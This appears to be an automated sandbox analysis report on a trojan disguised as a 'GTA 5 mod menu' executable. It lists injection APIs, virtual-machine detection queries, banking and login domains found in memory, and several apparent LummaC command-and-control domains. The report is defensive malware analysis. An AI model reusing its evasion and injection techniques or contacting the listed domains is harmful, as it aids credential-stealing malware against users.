Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00446ED3	4_2_00446ED3
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00446EF7	4_2_00446EF7
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00409690	4_2_00409690
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00438690	4_2_00438690
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00446EAE	4_2_00446EAE
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00426EBC	4_2_00426EBC
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00402F40	4_2_00402F40
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_0042B76F	4_2_0042B76F
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_0043E770	4_2_0043E770
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00422732	4_2_00422732
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00427F32	4_2_00427F32
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_0041A7C6	4_2_0041A7C6
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_0040AFF2	4_2_0040AFF2
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_0040F7F9	4_2_0040F7F9
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_0041D780	4_2_0041D780
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00446FA0	4_2_00446FA0
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_004357B3	4_2_004357B3

Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: String function: 00407FC0 appears 40 times
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: String function: 00414270 appears 58 times
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: String function: 00F966CD appears 34 times
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: String function: 00F91CE8 appears 42 times
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: String function: 00F89BB0 appears 94 times

Source: GTA-5-Mod-Menu-2025.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: GTA-5-Mod-Menu-2025.exe	Static PE information: Section: .BSS ZLIB complexity 1.0003287760416666
Source: GTA-5-Mod-Menu-2025.exe	Static PE information: Section: .BSS ZLIB complexity 1.0003287760416666

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/0@1/1

Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe

Code function: 4_2_00437C80 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

4_2_00437C80

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5800:120:WilError_03

Source: GTA-5-Mod-Menu-2025.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2123469100.0000000005CBC000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2123243115.0000000005CD9000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136873059.0000000005CCF000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: GTA-5-Mod-Menu-2025.exe

ReversingLabs: Detection: 31%

Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe

File read: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe "C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe"
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Process created: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe "C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe"
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Process created: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe "C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe"
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Process created: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe "C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe"	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Process created: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe "C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe"	Jump to behavior

Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: GTA-5-Mod-Menu-2025.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: GTA-5-Mod-Menu-2025.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: GTA-5-Mod-Menu-2025.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: GTA-5-Mod-Menu-2025.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: GTA-5-Mod-Menu-2025.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 0_2_00F89D6A push ecx; ret	0_2_00F89D7D
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 3_2_00F89D6A push ecx; ret	3_2_00F89D7D
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_004454B0 push edx; retf	4_2_004454B1
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00444667 push es; ret	4_2_0044466C
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_0043E740 push eax; mov dword ptr [esp], C5C4CBFAh	4_2_0043E741
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00444760 push ecx; iretd	4_2_004447D9

Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe

Window / User API: threadDelayed 6913

Jump to behavior

Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe TID: 1976	Thread sleep time: -150000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe TID: 340	Thread sleep count: 6913 > 30			Jump to behavior

Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 0_2_00F9B6A8 FindFirstFileExW,	0_2_00F9B6A8
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 0_2_00F9B759 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00F9B759
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 3_2_00F9B6A8 FindFirstFileExW,	3_2_00F9B6A8
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 3_2_00F9B759 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	3_2_00F9B759

Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2830538031.0000000003536000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2830464050.000000000352C000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2108369329.0000000003534000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000002.3338011938.0000000003537000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000002.3337910080.00000000034FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696487552p
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136171449.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe

API call chain: ExitProcess graph end node

graph_4-14492

Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe

Code function: 4_2_0043CF30 LdrInitializeThunk,

4_2_0043CF30

Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe

Code function: 0_2_00F89A33 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00F89A33

Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 0_2_00FB019E mov edi, dword ptr fs:[00000030h]	0_2_00FB019E
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 0_2_00F81BA0 mov edi, dword ptr fs:[00000030h]	0_2_00F81BA0
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 3_2_00F81BA0 mov edi, dword ptr fs:[00000030h]	3_2_00F81BA0

Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe

Code function: 0_2_00F96FE0 GetProcessHeap,

0_2_00F96FE0

Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 0_2_00F89A33 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00F89A33
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 0_2_00F91A20 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00F91A20
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 0_2_00F89A27 SetUnhandledExceptionFilter,	0_2_00F89A27
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 0_2_00F89673 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00F89673
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 3_2_00F89A33 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00F89A33
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 3_2_00F91A20 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00F91A20
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 3_2_00F89A27 SetUnhandledExceptionFilter,	3_2_00F89A27
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 3_2_00F89673 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00F89673

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe

Code function: 0_2_00FB019E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_00FB019E

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe

Memory written: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: GTA-5-Mod-Menu-2025.exe, 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: cloudewahsj.shop
Source: GTA-5-Mod-Menu-2025.exe, 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: rabidcowse.shop
Source: GTA-5-Mod-Menu-2025.exe, 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: noisycuttej.shop
Source: GTA-5-Mod-Menu-2025.exe, 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: tirepublicerj.shop
Source: GTA-5-Mod-Menu-2025.exe, 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: framekgirus.shop
Source: GTA-5-Mod-Menu-2025.exe, 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: wholersorie.shop
Source: GTA-5-Mod-Menu-2025.exe, 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: abruptyopsn.shop
Source: GTA-5-Mod-Menu-2025.exe, 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: nearycrepso.shop
Source: GTA-5-Mod-Menu-2025.exe, 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: fancywaxxers.shop

Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Process created: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe "C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe"			Jump to behavior
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Process created: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe "C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe"			Jump to behavior

Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: GetLocaleInfoW,	0_2_00F9B0D0
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: EnumSystemLocalesW,	0_2_00F968BD
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: EnumSystemLocalesW,	0_2_00F9B085
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00F9A9F7
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00F9B177
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: GetLocaleInfoW,	0_2_00F9B27D
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: GetLocaleInfoW,	0_2_00F963B5
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00F9ACF0
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: EnumSystemLocalesW,	0_2_00F9AC48
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: GetLocaleInfoW,	0_2_00F9AFB0
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: EnumSystemLocalesW,	0_2_00F9AF43
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: GetLocaleInfoW,	3_2_00F9B0D0
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: EnumSystemLocalesW,	3_2_00F968BD
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: EnumSystemLocalesW,	3_2_00F9B085
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	3_2_00F9A9F7
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_00F9B177
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: GetLocaleInfoW,	3_2_00F9B27D
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: GetLocaleInfoW,	3_2_00F963B5
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	3_2_00F9ACF0
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: EnumSystemLocalesW,	3_2_00F9AC48
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: GetLocaleInfoW,	3_2_00F9AFB0
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: EnumSystemLocalesW,	3_2_00F9AF43

